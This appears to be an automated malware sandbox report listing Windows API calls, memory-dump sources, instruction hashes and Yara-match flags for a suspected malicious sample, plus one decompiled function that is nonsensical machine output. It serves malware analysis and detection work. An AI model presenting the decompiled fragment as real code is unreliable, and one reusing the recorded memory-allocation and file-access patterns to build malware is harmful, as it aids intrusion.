                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012A7046,?,?,?,?,?), ref: 012A7107
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012A7046,?,?,?,?,?), ref: 012A7107
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012ABD21,00000800,00000000,00000000), ref: 012ABF32
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012ABD21,00000800,00000000,00000000), ref: 012ABF32
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012ABD21,00000800,00000000,00000000), ref: 012ABF32
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,012ABA73), ref: 012ABCA6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID:
                                                                      • API String ID: 4139908857-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,012AE148,?,?,?,?), ref: 012AE1BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LongWindow
                                                                      • String ID:
                                                                      • API String ID: 1378638983-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,012AE148,?,?,?,?), ref: 012AE1BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LongWindow
                                                                      • String ID:
                                                                      • API String ID: 1378638983-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ng\$ng\
                                                                      • API String ID: 0-2257563372
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: cp{
                                                                      • API String ID: 0-282242202
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5'Iv
                                                                      • API String ID: 0-1131325359
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5'Iv
                                                                      • API String ID: 0-1131325359
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ng\
                                                                      • API String ID: 0-3683008957
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2838cc91b3b1334cb1836870d87ae8a4a5e1f91677aec304852b739a28df952b
                                                                      • Instruction ID: f0408ae06c0920ba69cef782b0923f9aa9cbff9fadae97752f4d1d884a5add7f
                                                                      • Opcode Fuzzy Hash: 2838cc91b3b1334cb1836870d87ae8a4a5e1f91677aec304852b739a28df952b
                                                                      • Instruction Fuzzy Hash: A9A11674E052198FDF04CFA9C58669EFBF2AF88304F248566D814EB254E7349E42CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.347181866.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 457cf124553076b887b852b6ba056365b4eb28ca2e92cb1391e1edfc1a8ce9e6
                                                                      • Instruction ID: 9b9201fdc055be13c41d68433f67a765136771c58df071cdf2083ba79754161d
                                                                      • Opcode Fuzzy Hash: 457cf124553076b887b852b6ba056365b4eb28ca2e92cb1391e1edfc1a8ce9e6
                                                                      • Instruction Fuzzy Hash: BFC11CB1A237558BD710DF65F89E1893FA1BF85328F506208F2612BAD2DFB81446CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 674306f00c1b75e33bc65e3661efb1ae6582b038a9e51ea0dc511b224114825d
                                                                      • Instruction ID: 2103ca12f7ad7a4d338f8a4afeebd964e071ab24f58a5a94e9b274aafb223168
                                                                      • Opcode Fuzzy Hash: 674306f00c1b75e33bc65e3661efb1ae6582b038a9e51ea0dc511b224114825d
                                                                      • Instruction Fuzzy Hash: 85716C74E0521A8FCB04CFE9C84A6AEFBF2BB88314F14C826D815E7254D7349A46CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b5c1dc727698f1ee3e6477043dad3f9e7c9e94f8b7d13ff7cbef91aa45b904fc
                                                                      • Instruction ID: 5ab9783b9330c9a1a9b0ac72cf84178f1f27f7c3ea9574be283384b8de1e9c71
                                                                      • Opcode Fuzzy Hash: b5c1dc727698f1ee3e6477043dad3f9e7c9e94f8b7d13ff7cbef91aa45b904fc
                                                                      • Instruction Fuzzy Hash: F5614A74E0521A8FCB04CFE9C9869AEFBF2BB88310F14D825D815E7254D7389A45CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5b4fe64cc709bfea4ee31a4effe761bd3f01c830670143005cd36dba65ae918b
                                                                      • Instruction ID: 4827950026f9fd74266e3030ebfc609d44530439994095e7f8799806b8550b9e
                                                                      • Opcode Fuzzy Hash: 5b4fe64cc709bfea4ee31a4effe761bd3f01c830670143005cd36dba65ae918b
                                                                      • Instruction Fuzzy Hash: 57318EB4E15249CFDB18CF6AC8956AEBBF3BF89200F08C46AD808E7255DA345905CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.363091747.0000000005830000.00000040.00000001.sdmp, Offset: 05830000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e56d0539c33bfcb94588a6b30ebadf677e489616ab7a56bd916cfa5d134b8540
                                                                      • Instruction ID: 5968f7e62b1b7359d4fa809ef48a6ab3f3800bdf9bdfecf01221ce030d3cfbe2
                                                                      • Opcode Fuzzy Hash: e56d0539c33bfcb94588a6b30ebadf677e489616ab7a56bd916cfa5d134b8540
                                                                      • Instruction Fuzzy Hash: 04311870E116199BDB18CFAAD845AAEFBB3BB88200F14C06AD908E7254DB705A45CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E009745A8(signed int* __eax, signed char __ecx, signed int __edx, intOrPtr* __esi) {
                                                                      				signed int* _t3;
                                                                      				intOrPtr* _t4;
                                                                      				signed int _t6;
                                                                      				intOrPtr* _t7;
                                                                      				signed char _t9;
                                                                      				signed char _t13;
                                                                      				intOrPtr* _t16;
                                                                      				void* _t18;
                                                                      
                                                                      				_t16 = __esi;
                                                                      				_t9 = __ecx;
                                                                      				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
                                                                      				_t13 = __edx |  *(__edx - 0x62);
                                                                      				_t3 = __eax;
                                                                      				if(_t3 >= 0) {
                                                                      					 *_t3 = _t3 +  *_t3;
                                                                      					 *0x706f0316 =  *0x706f0316 + _t18;
                                                                      					 *_t3 = _t3 +  *_t3;
                                                                      					_push(es);
                                                                      					 *0x6f081725 = _t3;
                                                                      					_t3 = 0;
                                                                      				}
                                                                      				asm("rol byte [eax], 0x0");
                                                                      				asm("aas");
                                                                      				 *_t3 = _t3 +  *_t3;
                                                                      				_push(es);
                                                                      				asm("outsd");
                                                                      				 *(_t9 |  *_t3) =  *(_t9 |  *_t3);
                                                                      				_push(es);
                                                                      				 *0xa20a0000 =  *0xa20a0000 + _t3;
                                                                      				 *_t16 =  *_t16 + _t3;
                                                                      				_t4 = _t3 -  *_t3;
                                                                      				 *_t4 =  *_t4 + _t13;
                                                                      				 *_t4 =  *_t4 + _t4;
                                                                      				_t6 = _t4 +  *_t4 | 0x00a89b00;
                                                                      				asm("sldt word [eax]");
                                                                      				 *_t6 =  *_t6 + _t6;
                                                                      				asm("adc esi, [eax]");
                                                                      				_t7 = _t6 +  *_t6;
                                                                      				if (_t7 >= 0) goto L3;
                                                                      				 *_t7 =  *_t7 + _t7;
                                                                      				asm("outsd");
                                                                      				return _t7;
                                                                      			}

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.343912512.0000000000972000.00000002.00020000.sdmp, Offset: 00970000, based on PE: true
                                                                      • Associated: 00000000.00000002.343886503.0000000000970000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d1794a2922fe31a207d84325fcbe54dc648705599a518e00cef4ecd0f7ec8b9a
                                                                      • Instruction ID: e435441cfbb61a2d95f01a8477b14e3d9c12e4488cfb246fcb3214a14ec0e94e
                                                                      • Opcode Fuzzy Hash: d1794a2922fe31a207d84325fcbe54dc648705599a518e00cef4ecd0f7ec8b9a
                                                                      • Instruction Fuzzy Hash: 2401F22240E7C14FD7039B748C757963FB69F97254B1E88C7D0C08B1B3D2252A2AD762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 02E8C6F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.524813327.0000000002E80000.00000040.00000001.sdmp, Offset: 02E80000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 8920874f6640a77d1e84af8ae4cabfffdaadc895ac72783e32b1653eca73b5fa
                                                                      • Instruction ID: 40434378fa37c71fc7c37e17ab223f195dade96cac842ad9f68f3c5960466665
                                                                      • Opcode Fuzzy Hash: 8920874f6640a77d1e84af8ae4cabfffdaadc895ac72783e32b1653eca73b5fa
                                                                      • Instruction Fuzzy Hash: 0E41B0B1A042499FDB04DFA8D845BAEBBB4FF48314F15C16AE518AB381C7749944CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 02E8C6F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.524813327.0000000002E80000.00000040.00000001.sdmp, Offset: 02E80000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 1a003610dc4d386895ed8265ce931f1a0946a6b80057ec8c63f39ff064fa35f0
                                                                      • Instruction ID: 2116020ce8690ac9a6b45c35ab451d733b47cd01e79defbc4f827ab326c04916
                                                                      • Opcode Fuzzy Hash: 1a003610dc4d386895ed8265ce931f1a0946a6b80057ec8c63f39ff064fa35f0
                                                                      • Instruction Fuzzy Hash: 2C2145B6D0061A9FCF10DF99D980AEEFBB0FB48314F14852AE918B3610C375A954CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(00000000), ref: 02E85738
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.524813327.0000000002E80000.00000040.00000001.sdmp, Offset: 02E80000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: f77827ea2915276f09a076a5a2d983f8c804b94e00f782d7edec1e8407e3830b
                                                                      • Instruction ID: bc430fd2ec97c20e6cf930be2855d78dcfc9d013a437863d593d65d314bfec96
                                                                      • Opcode Fuzzy Hash: f77827ea2915276f09a076a5a2d983f8c804b94e00f782d7edec1e8407e3830b
                                                                      • Instruction Fuzzy Hash: 58215BB4D046599FCB20DFAAD844AEEFBB4FB48324F118219D818A3240C734A945CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(00000000), ref: 02E85738
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.524813327.0000000002E80000.00000040.00000001.sdmp, Offset: 02E80000, based on PE: false
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 98d250f14738c17b0ac4102f5ad5dd304819e3ed2f980d7f2f3984d879b16f08
                                                                      • Instruction ID: fda5dd3991bfdece201b8ad30f69f36d8abfd64ac42e230b7ff8a7f0e4bccf74
                                                                      • Opcode Fuzzy Hash: 98d250f14738c17b0ac4102f5ad5dd304819e3ed2f980d7f2f3984d879b16f08
                                                                      • Instruction Fuzzy Hash: 7C2138B5D046199BCB20DF9AD84579EFBB4FB48224F11C119E819A3340DB74A944CFE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.524813327.0000000002E80000.00000040.00000001.sdmp, Offset: 02E80000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 57389ba966cdf0bec4ba8a4346160d7af3b13720334e9ff05538fce3d264246e
                                                                      • Instruction ID: 775e28cd62237bcc749b393046e9f6b65b8e26b49b646c43548a07a6d0aca4e2
                                                                      • Opcode Fuzzy Hash: 57389ba966cdf0bec4ba8a4346160d7af3b13720334e9ff05538fce3d264246e
                                                                      • Instruction Fuzzy Hash: 0111E2B28442989FCF11DF94C844BDABBB0FF59308F10A156E559A7260C335D514DBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.520397657.0000000000C8D000.00000040.00000001.sdmp, Offset: 00C8D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dcead3cfcdcb7612de4d8a24bcfeb4bb2e42b4673117753268215c3070109b62
                                                                      • Instruction ID: a4cdaad3832eb2563dd0619294aa85b37a0e52baf80bf080cd25ec66e7e14d71
                                                                      • Opcode Fuzzy Hash: dcead3cfcdcb7612de4d8a24bcfeb4bb2e42b4673117753268215c3070109b62
                                                                      • Instruction Fuzzy Hash: 9001806140D3D05ED7128B258C94762BFB4DF43228F1980DBD884CF2D7C2695C48C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.520397657.0000000000C8D000.00000040.00000001.sdmp, Offset: 00C8D000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f4912b3bd52bea715e623bc6b5167d9e0a054613b5c52e7003ae2b381a795e29
                                                                      • Instruction ID: 105b1a65fe089af1d4feb27c8783728b457d740e39a978a4b1e97325aa5c0f00
                                                                      • Opcode Fuzzy Hash: f4912b3bd52bea715e623bc6b5167d9e0a054613b5c52e7003ae2b381a795e29
                                                                      • Instruction Fuzzy Hash: C40147704083409AD7206F26DC84767BB88EF4132CF188059FD065B2C6C7799D45C7B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Executed Functions

                                                                      APIs
                                                                      • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: B=A$B=A
                                                                      • API String ID: 2738559852-2767357659
                                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: B=A$B=A
                                                                      • API String ID: 2738559852-2767357659
                                                                      • Opcode ID: b24664ea22a8d2677ef3968178266d8f1581f4d8fc20cf31f494d12ab08bef84
                                                                      • Instruction ID: 434eb70047cd20c9a673e5bc859ccb1e0d837d886cba4685f3b49c9f24e11194
                                                                      • Opcode Fuzzy Hash: b24664ea22a8d2677ef3968178266d8f1581f4d8fc20cf31f494d12ab08bef84
                                                                      • Instruction Fuzzy Hash: 9DF0FFB2200149AFCB14DF98D890CEB77A9EF8C314B15865DFD4D97215CA34E855CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 4621568ce873deb1313e0de628d8eea835b94914331d8dec1d02c8297636d00b
                                                                      • Instruction ID: 8e2e50af6c7290f8a7d332b64cb89e442f3123e8e35f5a3a3d0f6bb0042b2ce1
                                                                      • Opcode Fuzzy Hash: 4621568ce873deb1313e0de628d8eea835b94914331d8dec1d02c8297636d00b
                                                                      • Instruction Fuzzy Hash: 360112B5D4010DBBDF10DAE5EC42FDEB378AB54318F0041A9E908A7281F635EB54C795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: ffd852a01f095e9be796bc636078d166d05e6badc43085123a98eb0a5d9cd2d4
                                                                      • Instruction ID: 191349821cd4a0c463ebb788c8edb38b2e0ec3cef2d015b4f138c3b9e46af32c
                                                                      • Opcode Fuzzy Hash: ffd852a01f095e9be796bc636078d166d05e6badc43085123a98eb0a5d9cd2d4
                                                                      • Instruction Fuzzy Hash: 33F01FB2204149ABCB48DF98DC84CEB77A9BF8C314B14828DFA1D97206C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                      • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: c00765c4e760d3cae1c2c3db117657141161a15b09d45a08a5295d9aba3f3056
                                                                      • Instruction ID: b812f75fbff491c7402776a2b738535134967762e89e2ca567daa203b1419bff
                                                                      • Opcode Fuzzy Hash: c00765c4e760d3cae1c2c3db117657141161a15b09d45a08a5295d9aba3f3056
                                                                      • Instruction Fuzzy Hash: B29002B121101812D14071A9440474A0005A7D0351F61C011E9054654EC6998DD577A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 77d00cf47570cfeabdcbe787e43621eb5022c760c4db7a11da993009644ae687
                                                                      • Instruction ID: b93982c9164e77b284a665ba977398cb3e7cb2a53989272cf4c17cefbdca3274
                                                                      • Opcode Fuzzy Hash: 77d00cf47570cfeabdcbe787e43621eb5022c760c4db7a11da993009644ae687
                                                                      • Instruction Fuzzy Hash: F09002B135101852D10061A94414B0A0005E7E1351F61C015E5054654DC659CC527266
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d8ae465141740501659d98d1a2b90e54e14b3c9ee7d26f3f1d4a7f6c7cecf017
                                                                      • Instruction ID: db655c52d6fc49ccd65074be8c8629ba165ba2c82548e583f6def6a39f610678
                                                                      • Opcode Fuzzy Hash: d8ae465141740501659d98d1a2b90e54e14b3c9ee7d26f3f1d4a7f6c7cecf017
                                                                      • Instruction Fuzzy Hash: 8990027121101823D11161A9450470B0009A7D0291FA1C412E4414658DD6968952B261
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
